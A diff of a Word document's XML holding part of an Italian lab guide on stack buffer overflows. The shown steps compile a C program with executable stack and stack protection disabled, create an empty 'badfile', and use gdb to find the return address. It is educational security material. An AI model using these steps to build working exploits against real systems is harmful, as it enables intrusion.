+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>. Come prima cosa andremo quindi a compilare il nostro file C con i seguenti flags.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6375,13 +6918,12 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
               </w:rPr>
               <w:t xml:space="preserve">$ </w:t>
             </w:r>
@@ -6389,7 +6931,6 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
               </w:rPr>
               <w:t>gcc</w:t>
             </w:r>
@@ -6397,7 +6938,48 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -z </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>execstack</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>fno</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">-stack-protector -g -o </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>stack_dbg</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
@@ -6405,367 +6987,100 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
-              </w:rPr>
-              <w:t>prog.c</w:t>
+              </w:rPr>
+              <w:t>stack.c</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -o </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
-              </w:rPr>
-              <w:t>prog</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>$ .</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">/prog </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>::</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> a1’s address is 0xbffff370 </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>$ .</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">/prog </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>::</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> a1’s address is 0xbffff37</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>0</w:t>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Se coincidono vuol dire che l’ASLR è stato disattivato con successo, se invece sono diversi significa che l’ASLR è ancora attivo, quindi si deve ripetere il comando riportato nella sezione </w:t>
-      </w:r>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dopo aver creato anche il nuovo file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>a)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> di questa guida.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
           <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
           <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> si va ad eseguire il file C compilato in modalità </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">d) </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>Individuare</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>il</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Return Address</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>Ora lo scopo è q</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">uello di individuare dove il codice viene allocato all’interno dello </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>stack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>. Come prima cosa andremo quindi a compilare il nostro file C con i seguenti flags.</w:t>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6799,13 +7114,41 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
+              <w:t xml:space="preserve">$ touch </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>badfile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
               <w:t xml:space="preserve">$ </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
@@ -6813,65 +7156,29 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>gcc</w:t>
+              <w:t>gdb</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve"> -z </w:t>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>execstack</w:t>
+              <w:t>stack_dbg</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>fno</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">-stack-protector -g -o </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>stack_dbg</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>stack.c</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -6905,32 +7212,41 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Dopo aver creato anche il nuovo file </w:t>
+        <w:t>Una volta eseguita la m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">odalità debugging, si va ad aggiungere un </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
           <w:kern w:val="3"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>badfile</w:t>
+        <w:t>breakpoint</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
           <w:kern w:val="3"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> alla funzione </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6939,7 +7255,18 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> si va ad eseguire il file C compilato in modalità </w:t>
+        <w:t>foo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e si esegue il programma. Come si potrà vedere dall’output della shell di comando, il programma si arresta alla funzione </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -6950,7 +7277,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>gdb</w:t>
+        <w:t>foo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
